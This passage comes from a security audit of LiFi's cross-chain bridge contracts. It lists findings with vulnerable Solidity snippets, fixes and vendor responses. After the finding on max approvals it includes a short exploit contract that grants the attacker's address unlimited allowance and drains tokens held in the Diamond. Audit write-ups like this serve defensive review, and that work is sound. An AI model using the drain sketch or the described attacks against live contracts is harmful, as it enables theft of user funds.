Facets/OwnershipFacet.sol:21:       error NewOwnerMustNotBeSelf();
Facets/OwnershipFacet.sol:22:       error NoPendingOwnershipTransfer();
Facets/OwnershipFacet.sol:23:       error NotPendingOwner();
Facets/PolygonBridgeFacet.sol:28:   error InvalidConfig();
Facets/PolygonBridgeFacet.sol:29:   error InvalidReceiver();
Facets/StargateFacet.sol:39:        error InvalidConfig();
Facets/StargateFacet.sol:40:        error InvalidStargateRouter();
Facets/StargateFacet.sol:41:        error InvalidCaller();
Facets/WithdrawFacet.sol:20:        error NotEnoughBalance(uint256 requested, uint256 available);
Facets/WithdrawFacet.sol:21:        error WithdrawFailed();
Helpers/ReentrancyGuard.sol:20:     error ReentrancyError();
Libraries/LibAccess.sol:18:         error UnAuthorized();
Libraries/LibSwap.sol:9:            error NoSwapFromZeroBalance();
Recommendation: Consider moving the error messages to GenericErrors.sol. LiFi: Fixed with PR #60. Spearbit: Verified.
diff --git a/findings_newupdate/spearbit/LIFI-retainer1-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/LIFI-retainer1-Spearbit-Security-Review.txt new file mode 100644 index 0000000..51b3b5e --- /dev/null +++ b/findings_newupdate/spearbit/LIFI-retainer1-Spearbit-Security-Review.txt @@ -0,0 +1,76 @@
+5.1.1 Receiver doesn't always reset allowance Severity: High Risk Context: Receiver.sol#L224-L297
Description: The function _swapAndCompleteBridgeTokens() of Receiver resets the approval to the executor at the end of an ERC20 transfer. However, if there is insufficient gas, the approval is not reset. This allows the executor to access any tokens (of the same type) left in the Receiver.
function _swapAndCompleteBridgeTokens(...) ... {
    ...
    if (LibAsset.isNativeAsset(assetId)) {
        ...
    } else {
        // case 2: ERC20 asset
        ...
        token.safeIncreaseAllowance(address(executor), amount);
        if (reserveRecoverGas && gasleft() < _recoverGas) {
            token.safeTransfer(receiver, amount);
            ...
            return; // no safeApprove 0
        }
        try executor.swapAndCompleteBridgeTokens{...} ...
        token.safeApprove(address(executor), 0);
    }
}
Recommendation: Only increase the allowance if sufficient gas is available, for example in the following way:
function _swapAndCompleteBridgeTokens(...) ... {
    ...
    if (LibAsset.isNativeAsset(assetId)) {
        ...
    } else {
        // case 2: ERC20 asset
        ...
-       token.safeIncreaseAllowance(address(executor), amount);
        if (reserveRecoverGas && gasleft() < _recoverGas) {
            token.safeTransfer(receiver, amount);
            ...
            return;
        }
+       token.safeIncreaseAllowance(address(executor), amount);
        try executor.swapAndCompleteBridgeTokens{...} ...
        token.safeApprove(address(executor), 0);
    }
}
LiFi: Fixed in PR 247. Spearbit: Verified.
+5.1.2 CelerIMFacet incorrectly sets RelayerCelerIM as receiver Severity: High Risk Context: CelerIMFacet.sol#L171-L177
Description: When assigning a memory variable (such as a struct in memory) to a new variable, the new variable points to the same memory location; changing one variable updates the other. Here is a PoC as a Foundry test:
function testCopy() public {
    Pp memory x = Pp({ a: 2, b: address(2) });
    Pp memory y = x;
    y.b = address(1);
    assertEq(x.b, y.b);
}
Thus, when CelerIMFacet._startBridge() updates bridgeDataAdjusted.receiver, _bridgeData.receiver is implicitly updated too. This makes the receiver on the destination chain the relayer address.
// case 'yes': bridge + dest call - send to relayer
ILiFi.BridgeData memory bridgeDataAdjusted = _bridgeData;
bridgeDataAdjusted.receiver = address(relayer);
(bytes32 transferId, address bridgeAddress) = relayer
    .sendTokenTransfer{ value: msgValue }(bridgeDataAdjusted, _celerIMData);
// call message bus via relayer incl messageBusFee
relayer.forwardSendMessageWithTransfer{ value: _celerIMData.messageBusFee }(
    _bridgeData.receiver,
    uint64(_bridgeData.destinationChainId),
    bridgeAddress,
    transferId,
    _celerIMData.callData
);
Recommendation: Remove bridgeDataAdjusted and work with _bridgeData as follows:
// case 'yes': bridge + dest call - send to relayer
-ILiFi.BridgeData memory bridgeDataAdjusted = _bridgeData;
-bridgeDataAdjusted.receiver = address(relayer);
+address receiver = _bridgeData.receiver;
+_bridgeData.receiver = address(relayer);
(bytes32 transferId, address bridgeAddress) = relayer
-    .sendTokenTransfer{ value: msgValue }(bridgeDataAdjusted, _celerIMData);
+    .sendTokenTransfer{ value: msgValue }(_bridgeData, _celerIMData);
// call message bus via relayer incl messageBusFee
relayer.forwardSendMessageWithTransfer{ value: _celerIMData.messageBusFee }(
-    _bridgeData.receiver,
+    receiver,
    uint64(_bridgeData.destinationChainId),
    bridgeAddress,
    transferId,
    _celerIMData.callData
);
+_bridgeData.receiver = receiver;
LiFi: Fixed in PR 252. Spearbit: Verified.
+5.1.3 Max approval to any address is possible Severity: High Risk Context: HopFacetOptimized.sol#L33-L45
Description: HopFacetOptimized.setApprovalForBridges() can be called by anyone to give max approval to any address for any ERC20 token. Any ERC20 token left in the Diamond can be stolen.
function setApprovalForBridges(address[] calldata bridges, address[] calldata tokensToApprove) external {
    ...
    LibAsset.maxApproveERC20(..., type(uint256).max);
    ...
}
Recommendation: Add authorization to the function setApprovalForBridges() so only the owner can call it (an illustrative exploit sketch follows below). For example in the following way:
function setApprovalForBridges(address[] calldata bridges, address[] calldata tokensToApprove) external {
+   LibDiamond.enforceIsContractOwner();
    ...
    LibAsset.maxApproveERC20(..., type(uint256).max);
    ...
}
LiFi: Fixed in PR 244. Spearbit: Verified.
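As referenced in 5.1.3, an illustrative sketch of why the unauthenticated setApprovalForBridges() is dangerous; the interfaces are reduced to the calls used and the scenario is hypothetical, not a reproduction against the real deployment:
interface IERC20Minimal {
    function balanceOf(address account) external view returns (uint256);
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

interface IHopFacetOptimized {
    function setApprovalForBridges(address[] calldata bridges, address[] calldata tokensToApprove) external;
}

contract ApprovalExploitSketch {
    // Before the fix, any caller could route a max approval to themselves
    // and sweep tokens left in the Diamond in the same transaction.
    function drain(IHopFacetOptimized diamond, IERC20Minimal token, address attacker) external {
        address[] memory bridges = new address[](1);
        bridges[0] = attacker; // attacker-chosen spender gets type(uint256).max allowance
        address[] memory tokens = new address[](1);
        tokens[0] = address(token);
        diamond.setApprovalForBridges(bridges, tokens); // no authorization check pre-fix
        token.transferFrom(address(diamond), attacker, token.balanceOf(address(diamond)));
    }
}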
+5.1.4 Return value of low-level .call() not checked Severity: High Risk Context: Receiver.sol#L209, Receiver.sol#L238, Receiver.sol#L257
Description: The low-level primitive .call() doesn't revert in the caller's context when the callee reverts. If its return value is not checked, it can lead the caller to falsely believe that the call was successful. Receiver.sol uses .call() to transfer the native token to receiver. If receiver reverts, this can lead to locked ETH in the Receiver contract.
Recommendation: Check the return value and revert if false is returned.
-receiver.call{ value: amount }("");
+(bool success, ) = receiver.call{ value: amount }("");
+require(success);
LiFi: Fixed in PR 244. Spearbit: Verified.
5.2 Medium Risk
+5.2.1 Limits in LIFuelFacet Severity: Medium Risk Context: LIFuelFacet.sol#L72-L101
Description: The facet LIFuelFacet is meant for small amounts; however, it doesn't have any limits on the funds sent. This might result in funds getting stuck due to insufficient liquidity on the receiving side.
function _startBridge(...) ... {
    ...
    if (LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) {
        serviceFeeCollector.collectNativeGasFees{...}(...);
    } else {
        LibAsset.maxApproveERC20(...);
        serviceFeeCollector.collectTokenGasFees(...);
        ...
    }
}
Recommendation: Consider enforcing limits in LIFuelFacet. LiFi: Limits apply to all bridges and depend on the liquidity on the receiving chain. This information is usually not available on the source chain. For sure some high fixed limits could be added but they don't really check that there is that much liquidity available. Checking limits and applying them to the calls is handled by the backend. Spearbit: Acknowledged.
+5.2.2 The optimal version _depositAndSwap() isn't always used Severity: Medium Risk Context: SwapperV2.sol#L138-L221, AmarokFacet.sol#L97-L102, CelerIMFacet.sol#L127-L132, AllBridgeFacet.sol#L79-L84, SquidFacet.sol#L112-L117
Description: The function _depositAndSwap() of SwapperV2 has two versions. The second version keeps _nativeReserve, which is meant for fees. Several facets don't use this version although their bridge does require native fees. This could result in calls reverting due to insufficient native tokens left.
function _depositAndSwap(...) ... // 4 parameter version
/// @param _nativeReserve Amount of native token to prevent from being swept back to the caller
function _depositAndSwap(..., uint256 _nativeReserve) ... // 5 parameter version
Recommendation: Use the 5 parameter version of _depositAndSwap() where applicable. LiFi: CelerIMFacet is changed to use the 5 parameter version. Other facets don't need this change since we don't bridge native tokens via those facets. Solved in PR 256. Spearbit: Verified.
+5.2.3 setContractOwner() is insufficient to lock down the owner Severity: Medium Risk Context: LibDiamond.sol#L70-L75, OwnershipFacet.sol#L66-L73, MakeLiFiDiamondImmutable.s.sol#L14-L17
Description: The function transferOwnershipToZeroAddress() is meant to make the Diamond immutable. It sets the contract owner to 0. However, the contract owner can still be changed if there happens to be a pendingOwner. In that case, confirmOwnershipTransfer() can still change the contract owner.
function transferOwnershipToZeroAddress() external {
    // transfer ownership to 0 address
    LibDiamond.setContractOwner(address(0));
}
function setContractOwner(address _newOwner) internal {
    DiamondStorage storage ds = diamondStorage();
    address previousOwner = ds.contractOwner;
    ds.contractOwner = _newOwner;
    emit OwnershipTransferred(previousOwner, _newOwner);
}
function confirmOwnershipTransfer() external {
    Storage storage s = getStorage();
    address _pendingOwner = s.newOwner;
    if (msg.sender != _pendingOwner) revert NotPendingOwner();
    emit OwnershipTransferred(LibDiamond.contractOwner(), _pendingOwner);
    LibDiamond.setContractOwner(_pendingOwner);
    s.newOwner = LibAsset.NULL_ADDRESS;
}
Recommendation: Possible solutions:
• first call cancelOwnershipTransfer() (and ignore reverts)
• reset s.newOwner of the OwnershipFacet
• also remove OwnershipFacet (but then function owner() is no longer accessible)
LiFi: Solved in PR 250. Spearbit: Verified.
+5.2.4 Receiver does not verify address from the originator chain Severity: Medium Risk Context: Receiver.sol#L254, Receiver.sol#L282
Description: The Receiver contract is designed to receive the cross-chain call from the LiFi Diamond address on the destination chain. However, it does not verify the source chain address. An attacker can build malicious _callData. An attacker can steal funds if there are leftover tokens and there are allowances to the Executor. Note that the tokens may be lost in issue "Arithmetic underflow leading to unexpected revert and loss of funds in Receiver contract", and there may be allowances to the Executor in issue "Receiver doesn't always reset allowance".
Recommendation: This is a tricky issue. We recommend fixing the other issues, especially making sure to clear the allowance. The bridges we're integrating do not always allow users to verify the source address. Take Amarok for example; technically we can verify the sender's address:
/// @notice Completes a cross-chain transaction with calldata via Amarok facet on the receiving chain.
/// @dev This function is called from Amarok Router.
/// @param _transferId The unique ID of this transaction (assigned by Amarok)
/// @param _amount the amount of bridged tokens
/// @param _asset the address of the bridged token
/// @param * (unused) the sender of the transaction
/// @param * (unused) the domain ID of the src chain
/// @param _callData The data to execute
function xReceive(
    bytes32 _transferId,
    uint256 _amount,
    address _asset,
    address _sender,
    uint32,
    bytes memory _callData
) external nonReentrant onlyAmarokRouter {
    if (_sender != address(diamond)) {
        revert UnAuthorized();
    }
}
However, there's a special feature of Amarok: the _sender address would be address(0) if this is a fast path. If we revert such transactions, all the cross-chain transfers through Amarok would take about 30 minutes and this impacts UX. LiFi: Solved by solving the related issues. Spearbit: Verified.
+5.2.5 Arithmetic underflow leading to unexpected revert and loss of funds in Receiver contract Severity: Medium Risk Context: Receiver.sol#L254, Receiver.sol#L282
Description: The Receiver contract is designed to gracefully return the funds to users. It reserves gas for recovering funds before doing swaps via executor.swapAndCompleteBridgeTokens. The logic of reserving gas for recovering funds is implemented at Receiver.sol#L236-L258:
contract Receiver is ILiFi, ReentrancyGuard, TransferrableOwnership {
    // ...
    if (reserveRecoverGas && gasleft() < _recoverGas) {
        // case 1a: not enough gas left to execute calls
        receiver.call{ value: amount }("");
        // ...
    }
    // case 1b: enough gas left to execute calls
    try executor.swapAndCompleteBridgeTokens{
        value: amount,
        gas: gasleft() - _recoverGas
    }(_transactionId, _swapData, assetId, receiver) {} catch {
        receiver.call{ value: amount }("");
    }
    // ...
}
if (reserveRecoverGas && gasleft() < _recoverGas) { // case 1a: not enough gas left to execute calls receiver.call{ value: amount }(""); // ... } // case 1b: enough gas left to execute calls try executor.swapAndCompleteBridgeTokens{ value: amount, gas: gasleft() - _recoverGas }(_transactionId, _swapData, assetId, receiver) {} catch { receiver.call{ value: amount }(""); } // ... } gasleft() returns the remaining gas of a call and is continuously decreasing, so the second query of gasleft() is smaller than the first. Hence, if an attacker relays the transaction with a carefully crafted gas amount such that gasleft() >= _recoverGas at the first query, the subtraction gasleft() - _recoverGas can underflow and revert at the second query. This results in token loss in the Receiver contract. Recommendation: Recommend caching the gasleft() value:
 if (LibAsset.isNativeAsset(assetId)) { // case 1: native asset
+    uint256 cacheGasleft = gasleft();
-    if (reserveRecoverGas && gasleft() < _recoverGas) {
+    if (reserveRecoverGas && cacheGasleft < _recoverGas) {
         // case 1a: not enough gas left to execute calls
         receiver.call{ value: amount }("");
         emit LiFiTransferRecovered( _transactionId, assetId, receiver, amount, block.timestamp );
         return;
     }
     // case 1b: enough gas left to execute calls
     try executor.swapAndCompleteBridgeTokens{
         value: amount,
-        gas: gasleft() - _recoverGas
+        gas: cacheGasleft - _recoverGas
     }(_transactionId, _swapData, assetId, receiver) {} catch { receiver.call{ value: amount }(""); }
 } else {
LiFi: Solved in PR 249. Spearbit: Verified.
+5.2.6 Use of name to identify a token Severity: Medium Risk Context: CelerIMFacet.sol#L79-L83 Description: startBridgeTokensViaCelerIM() uses the token symbol to identify the cfUSDC token. Another token with the same symbol can pass this check. An attacker can create a scam token with the symbol "cfUSDC" and a function canonical() returning a legit ERC20 token address, say WETH. If this token is passed as _bridgeData.sendingAssetId, CelerIMFacet will transfer WETH. if ( keccak256( abi.encodePacked( ERC20(_bridgeData.sendingAssetId).symbol() ) ) == keccak256(abi.encodePacked(("cfUSDC"))) ) { // special case for cfUSDC token asset = IERC20( CelerToken(_bridgeData.sendingAssetId).canonical() ); } Recommendation: Store the cfUSDC address as a constant variable. Use the onlyAllowSourceToken modifier to verify _bridgeData.sendingAssetId matches that address. LiFi: Fixed in PR 254. Spearbit: Verified.
+5.2.7 Unvalidated destination address in Gravity facet Severity: Medium Risk Context: GravityFacet.sol#L101 Description: In the Gravity facet, there is an issue related to the validation of the _gravityData.destinationAddress address. The code does not validate whether the provided destination address is in the valid bech32 format. This can potentially cause issues when sending tokens to the destination address. If the provided address is not in the bech32 format, the tokens can be locked. Also, it can lead to confusion for end users, as they might enter an invalid address and lose their tokens without any warning or error message. Recommendation: To mitigate this issue, it is recommended to add a validation check for the _gravityData.destinationAddress address. The validation should ensure that the provided address is in the valid bech32 format. This will help prevent the loss of tokens and provide better error handling for the end users. Here are some libraries that might be used: • Bech32.sol • pStake's Bech32.sol LiFi: We validate the address on the backend side, and we don't want to double check in the contract.
Spearbit: Acknowledged.
+5.2.8 Hardcode or whitelist the Thorswap vault address Severity: Medium Risk Context: ThorSwapFacet.sol#LL104C27-L104C32 Description: The issue with this code is that the depositWithExpiry function allows the user to enter any arbitrary vault address, which could potentially lead to a loss of tokens. If a user enters an incorrect or non-existent vault address, the tokens could be lost forever. There should be some validation on the vault address to ensure that it is a valid and trusted address before deposits are allowed to be made to it. • Router // Deposit an asset with a memo. ETH is forwarded, ERC-20 stays in ROUTER function deposit(address payable vault, address asset, uint amount, string memory memo) public payable nonReentrant { uint safeAmount; if(asset == address(0)){ safeAmount = msg.value; bool success = vault.send(safeAmount); require(success); } else { require(msg.value == 0, "THORChain_Router: unexpected eth"); // protect user from accidentally locking up eth if(asset == RUNE) { safeAmount = amount; iRUNE(RUNE).transferTo(address(this), amount); iERC20(RUNE).burn(amount); } else { safeAmount = safeTransferFrom(asset, amount); // Transfer asset _vaultAllowance[vault][asset] += safeAmount; // Credit to chosen vault } } emit Deposit(vault, asset, safeAmount, memo); } Recommendation: Hardcode or whitelist the vault address. Asgard vault addresses can be seen here. LiFi: The LiFi team claims that they are validating the address on the backend side. Spearbit: Acknowledged.
5.3 Low Risk
+5.3.1 Check enough native assets for fee Severity: Low Risk Context: ArbitrumBridgeFacet.sol#L81-L117, SquidFacet.sol#L126-L175, CelerIMFacet.sol#L156-L187, DeBridgeFacet.sol#L119-L148 Description: The function _startBridge() of SquidFacet adds _squidData.fee to _bridgeData.minAmount. It has verified there is enough native asset for _bridgeData.minAmount, but not for _squidData.fee. So this could use native assets present in the Diamond, although there normally shouldn't be any native assets left. A similar issue occurs in: • CelerIMFacet • DeBridgeFacet function _startBridge(...) ... { ... uint256 msgValue = _squidData.fee; if (LibAsset.isNativeAsset(address(sendingAssetId))) { msgValue += _bridgeData.minAmount; } ... ... squidRouter.bridgeCall{ value: msgValue }(...); ... } Recommendation: Consider checking that enough native asset is sent for the fee. Note: ArbitrumBridgeFacet has extra logic, which might be used elsewhere. LiFi: We know it. We keep no tokens in the Diamond, and the tx will revert if there's not enough native asset. Spearbit: Acknowledged.
+5.3.2 No check on native assets Severity: Low Risk Context: HopFacetOptimized.sol#L77-L92, GnosisBridgeL2Facet.sol#L39-L53, MultichainFacet.sol#L145-L166 Description: The functions startBridgeTokensViaHopL1Native(), startBridgeTokensViaXDaiBridge() and startBridgeTokensViaMultichain() don't check _bridgeData.minAmount <= msg.value. So this could use native assets that are still in the Diamond, although that normally shouldn't happen. This might be an issue in combination with reentrancy. function startBridgeTokensViaHopL1Native(...) ... { _hopData.hopBridge.sendToL2{ value: _bridgeData.minAmount }( ... ); ... } function startBridgeTokensViaXDaiBridge(...) ... { _startBridge(_bridgeData); } function startBridgeTokensViaMultichain(...) ...
{ if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { LibAsset.depositAsset(_bridgeData.sendingAssetId, _bridgeData.minAmount); } // no check for native assets _startBridge(_bridgeData, _multichainData); } Recommendation: Consider checking that sufficient native asset is supplied. LiFi: We do this on purpose, as no tokens should be in the contract. The transaction will revert if not enough tokens are there, so we don't need to check manually, and we save gas. Spearbit: Acknowledged.
+5.3.3 Missing doesNotContainDestinationCalls() Severity: Low Risk Context: LIFuelFacet.sol#L27-L42 Description: The functions startBridgeTokensViaLIFuel() and swapAndStartBridgeTokensViaLIFuel() don't have doesNotContainDestinationCalls(). function startBridgeTokensViaLIFuel(...) external payable nonReentrant refundExcessNative(payable(msg.sender)) doesNotContainSourceSwaps(_bridgeData) validateBridgeData(_bridgeData) { ... } Recommendation: Consider adding doesNotContainDestinationCalls(). LiFi: Fixed in PR 273. Spearbit: Verified.
+5.3.4 Race condition in _startBridge of LIFuelFacet Severity: Low Risk Context: LIFuelFacet.sol#L72-L101, PeripheryRegistryFacet.sol#L34-L41 Description: If the mapping for FEE_COLLECTOR_NAME hasn't been set up yet, then serviceFeeCollector will be address(0) in function _startBridge of LIFuelFacet. This might give unexpected results. function _startBridge(...) ... { ... ServiceFeeCollector serviceFeeCollector = ServiceFeeCollector( LibMappings.getPeripheryRegistryMappings().contracts[FEE_COLLECTOR_NAME] ); ... } function getPeripheryContract(string calldata _name) external view returns (address) { return LibMappings.getPeripheryRegistryMappings().contracts[_name]; } Recommendation: Consider calling getPeripheryContract() instead of accessing the PeripheryRegistryMappings directly. In getPeripheryContract(), consider reverting if the value is empty. LiFi: Keep this as it is. It will revert when it tries to call collectNativeGasFees or collectTokenGasFees. Spearbit: Acknowledged.
+5.3.5 Sweep tokens from Hop facets Severity: Low Risk Context: HopFacet.sol, HopFacetOptimized.sol Description: The Hop bridges HopFacet and HopFacetOptimized don't check that _bridgeData.sendingAssetId is the same as the bridge token. So this could be used to sweep tokens out of the Diamond contract. Normally there shouldn't be any tokens left in the Diamond; however, in this version there are small amounts left: Etherscan LiFiDiamond. Recommendation: Check _bridgeData.sendingAssetId == bridge.token() in _startBridge, after the bridge has been determined. LiFi: We get the bridge from the sendingAssetId, which means the bridge.token() is _bridgeData.sendingAssetId. address sendingAssetId = _bridgeData.sendingAssetId; Storage storage s = getStorage(); IHopBridge bridge = s.bridges[sendingAssetId]; Also, we keep no tokens in the Diamond, so we think we can leave it as is. Spearbit: Acknowledged.
+5.3.6 Missing emit in _swapAndCompleteBridgeTokens of Receiver Severity: Low Risk Context: Receiver.sol#L224-L297 Description: In function _swapAndCompleteBridgeTokens, the catch for ERC20 tokens does an emit, while the comparable catch for native assets doesn't. function _swapAndCompleteBridgeTokens(...) ... { ... if (LibAsset.isNativeAsset(assetId)) { .. try ... {} catch { receiver.call{ value: amount }(""); // no emit } ... } else { // case 2: ERC20 asset ... try ... {} catch { token.safeTransfer(receiver, amount); emit LiFiTransferRecovered(...); } } } Recommendation: Add an emit to the catch for native assets.
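A minimal sketch of the suggested change (hedged: it assumes the native-asset catch can reuse the LiFiTransferRecovered event and local variables shown in 5.2.5 above):
try executor.swapAndCompleteBridgeTokens{ value: amount, gas: gasleft() - _recoverGas }(
    _transactionId, _swapData, assetId, receiver
) {} catch {
    receiver.call{ value: amount }("");
    // mirror the ERC20 branch so recoveries on the native path are also observable off-chain
    emit LiFiTransferRecovered(_transactionId, assetId, receiver, amount, block.timestamp);
}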
LiFi: Fixed in PR 281. Spearbit: Verified.
+5.3.7 Spam events in ServiceFeeCollector Severity: Low Risk Context: ServiceFeeCollector.sol#L44-L110 Description: The contract ServiceFeeCollector has several functions that collect fees and are permissionless. This could result in spam events, which might confuse the processing of the events. function collectTokenGasFees(...) ... { ... emit GasFeesCollected(tokenAddress, receiver, feeAmount); } function collectNativeGasFees(...) ... { ... emit GasFeesCollected(LibAsset.NULL_ADDRESS, receiver, feeAmount); } function collectTokenInsuranceFees(...) ... { ... emit InsuranceFeesCollected(tokenAddress, receiver, feeAmount); } function collectNativeInsuranceFees(...) ... { ... emit InsuranceFeesCollected(LibAsset.NULL_ADDRESS, receiver, feeAmount); } Recommendation: If spam events are relevant, consider adding authorization to the functions. LiFi: Acknowledged. Spearbit: Acknowledged.
+5.3.8 Function depositAsset() allows 0 amount of native assets Severity: Low Risk Context: LibAsset.sol#L107-L116 Description: The function depositAsset() disallows amount == 0 for ERC20 tokens; however, it does allow amount == 0 for native assets. function depositAsset(address assetId, uint256 amount) internal { if (isNativeAsset(assetId)) { if (msg.value < amount) revert InvalidAmount(); } else { if (amount == 0) revert InvalidAmount(); ... } } Recommendation: Consider also checking amount == 0 for native assets. LiFi: Fixed in PR 279. Spearbit: Verified.
+5.3.9 Inadequate expiration time check in ThorSwapFacet Severity: Low Risk Context: ThorSwapFacet.sol#L108 Description: According to Thorchain, the expiration time for certain operations should be set to +60 minutes. However, there is currently no check in place to enforce this requirement. This oversight may lead to users inadvertently setting incorrect expiration times, potentially causing unexpected behavior or issues within the ThorSwapFacet. Recommendation: Consider adding a validation check within the ThorSwapFacet to ensure that expiration times are set to +60 minutes. LiFi: Fixed with PR 278. Spearbit: Verified.
+5.3.10 Insufficient validation of bridgedTokenSymbol and sendingAssetId Severity: Low Risk Context: SquidFacet.sol#L146-L166 Description: During the code review, it has been noticed that the facet does not adequately check the correspondence between the bridgedTokenSymbol and sendingAssetId parameters. This oversight could allow a random token to be sent to the Diamond while still bridging another available token within the Diamond, even though no tokens should typically be left in the Diamond. Recommendation: Consider implementing validation mechanisms to ensure that bridgedTokenSymbol and sendingAssetId correspond before executing any asset transfers. LiFi: Fixed with PR 282. Spearbit: Verified.
+5.3.11 Check for destinationChainId in CBridgeFacet Severity: Low Risk Context: CBridgeFacet.sol#L94-L128, Validatable.sol#L11-L22 Description: Function _startBridge() of CBridgeFacet contains a check on destinationChainId and contains conversions to uint64. If both block.chainid and _bridgeData.destinationChainId fit in a uint64, then the checks of modifier validateBridgeData are already sufficient.
When _bridgeData.destinationChainId > type(uint64).max, this check never reverts: if (uint64(block.chainid) == _bridgeData.destinationChainId) revert CannotBridgeToSameNetwork(); The rest of the code then uses the truncated version of the destinationChainId via uint64(_bridgeData.destinationChainId), which can be any value, including block.chainid. So you can still bridge to the same chain. function _startBridge(ILiFi.BridgeData memory _bridgeData, CBridgeData memory _cBridgeData) private { if (uint64(block.chainid) == _bridgeData.destinationChainId) revert CannotBridgeToSameNetwork(); if (...) { cBridge.sendNative{ value: _bridgeData.minAmount }(..., uint64(_bridgeData.destinationChainId), ...); } else { ... cBridge.send(..., uint64(_bridgeData.destinationChainId), ...); } } modifier validateBridgeData(ILiFi.BridgeData memory _bridgeData) { ... if (_bridgeData.destinationChainId == block.chainid) { revert CannotBridgeToSameNetwork(); } ... } Recommendation: If there are situations where block.chainid or _bridgeData.destinationChainId could be too large for a uint64, then verify this. Remove the redundant check if (uint64(block.chainid) == _bridgeData.destinationChainId). LiFi: Fixed with PR 275. Spearbit: Verified.
+5.3.12 Absence of nonReentrant in HopFacetOptimized facet Severity: Low Risk Context: HopFacetOptimized.sol#L12, ERC20Proxy.sol Description: HopFacetOptimized is a facet-based smart contract implementation that aims to optimize gas usage and streamline the execution of certain functions. It doesn't have the checks that other facets have: nonReentrant refundExcessNative(payable(msg.sender)) containsSourceSwaps(_bridgeData) doesNotContainDestinationCalls(_bridgeData) validateBridgeData(_bridgeData) Most missing checks were omitted on purpose to save gas. However, the most important check is the nonReentrant modifier. In several places in the Diamond it is possible to trigger a reentrant call, for example via ERC777 tokens, custom tokens, or native token transfers. In combination with the complexity of the code and the power of ERC20Proxy.sol, it is difficult to make sure no attacks can occur. Recommendation: Consider doing one of the following: • add nonReentrant to the functions of HopFacetOptimized.sol • separate HopFacetOptimized.sol from the Diamond contracts; – to keep one address for setting allowances by the users, consider using ERC20Proxy or Uniswap's permit2. To prevent stuck native assets, consider removing the payable keyword from the following functions, because they normally wouldn't receive native assets. Note: this does cost some extra gas. • swapAndStartBridgeTokensViaHopL1Native() • swapAndStartBridgeTokensViaHopL2Native() LiFi: Acknowledged. • We think it's still safe without the nonReentrant modifier since we keep no tokens in the Diamond. • Keeping the payable keyword is useful in situations where the amount is partly paid in ERC20 tokens and partly in native tokens. Spearbit: Acknowledged.
+5.3.13 Revert for excessive approvals Severity: Low Risk Context: HopFacetOptimized.sol#L42 Description: Certain tokens, such as UNI and COMP, revert if the value input for approval or transfer exceeds uint96. Both aforementioned tokens have special logic in their approval process that sets the allowance to the maximum value of uint96 when the approval amount equals uint256(-1). Note: Hop currently doesn't support these tokens, so this is set to low risk.
Recommendation: To address this issue, it is advised to implement a standardized validation mechanism for the approval processes. This mechanism should verify and restrict the input values to be within the allowable uint96 range, preventing reverts. LiFi: Acknowledged. Spearbit: Acknowledged.
+5.3.14 Inconsistent transaction failure/stuck due to missing validation of global fixed native fee rate and execution fee Severity: Low Risk Context: DeBridgeFacet.sol#L124 Description: The current implementation of the facet logic does not validate the global fixed native fee rate and execution fee, which can lead to inconsistent transaction failures or transactions getting stuck in the process. This issue can arise when the fee rate is not set correctly or when there are discrepancies between the fee rate used in the smart contract and the actual fee rate. This can result in transactions getting rejected or stuck, causing inconvenience to users and affecting the overall user experience. Recommendation: To avoid this issue, it is recommended to include a validation step for the global fixed native fee rate in the transaction logic. This can be done by fetching the current fee rate from the DeBridge gate and comparing it with the fee rate used in the transaction (a short sketch follows after 5.3.17 below). uint protocolFee = deBridgeGate.globalFixedNativeFee; LiFi: Fixed with PR 253. Spearbit: Verified.
+5.3.15 Incorrect value emitted Severity: Low Risk Context: LibSwap.sol#L76-L78 Description: LibSwap.swap() emits the following: emit AssetSwapped( transactionId, _swap.callTo, _swap.sendingAssetId, _swap.receivingAssetId, _swap.fromAmount, newBalance > initialReceivingAssetBalance // toAmount ? newBalance - initialReceivingAssetBalance : newBalance, block.timestamp ); It will be difficult to interpret the value emitted for toAmount, as the observer won't know which of the two values has been emitted. Recommendation: Depending on the intended definition of toAmount, reconsider emitting one of the two values. LiFi: Acknowledged. Spearbit: Acknowledged.
+5.3.16 Storage slots derived from hashes are prone to pre-image attacks Severity: Low Risk Context: AxelarFacet.sol#L17, HopFacet.sol#L19, MultichainFacet.sol#L24, OptimismBridgeFacet.sol#L26, OwnershipFacet.sol#L16, ReentrancyGuard.sol#L10, LibAccess.sol#L12, LibAllowList.sol#L12, LibDiamond.sol#L12, LibMappings.sol#L12-L1 Description: Storage slots manually constructed using the keccak hash of a string are prone to storage slot collision, as the pre-images of these hashes are known. Attackers may find a potential path to those storage slots using the keccak hash function in the codebase and some crafted payload. Recommendation: Subtract 1 from the keccak hash before assigning it to NAMESPACE: bytes32 internal constant STARGATE_NAMESPACE = bytes32(uint(keccak256("com.lifi.library.mappings.stargate")) - 1); LiFi: Acknowledged. Spearbit: Acknowledged.
+5.3.17 Incorrect arguments compared in SquidFacet Severity: Low Risk Context: SquidFacet.sol#L69 Description: startBridgeTokensViaSquid() reverts if (_squidData.sourceCalls.length > 0) != _bridgeData.hasSourceSwaps. Here, _squidData.sourceCalls is an argument passed to the Squid Router, and _bridgeData.hasSourceSwaps refers to source swaps done by SquidFacet. Ideally, _bridgeData.hasSourceSwaps should be false for this function (though it's not enforced), which means _squidData.sourceCalls.length has to be 0 for it to execute successfully. Recommendation: Remove this check. LiFi: Fixed in PR 258. Spearbit: Verified.
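Returning to 5.3.14: a minimal sketch of the suggested fee validation (hedged; the surrounding variable names and the revert used are illustrative assumptions, only the deBridgeGate.globalFixedNativeFee read is taken from the finding above):
// fetch the gate's current fixed native fee and validate the native amount forwarded
uint256 protocolFee = deBridgeGate.globalFixedNativeFee;
// for a native-asset bridge, the caller must cover the bridged amount plus the protocol fee
if (msg.value < _bridgeData.minAmount + protocolFee) {
    revert InvalidAmount(); // hypothetical choice; an existing generic error could be reused
}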
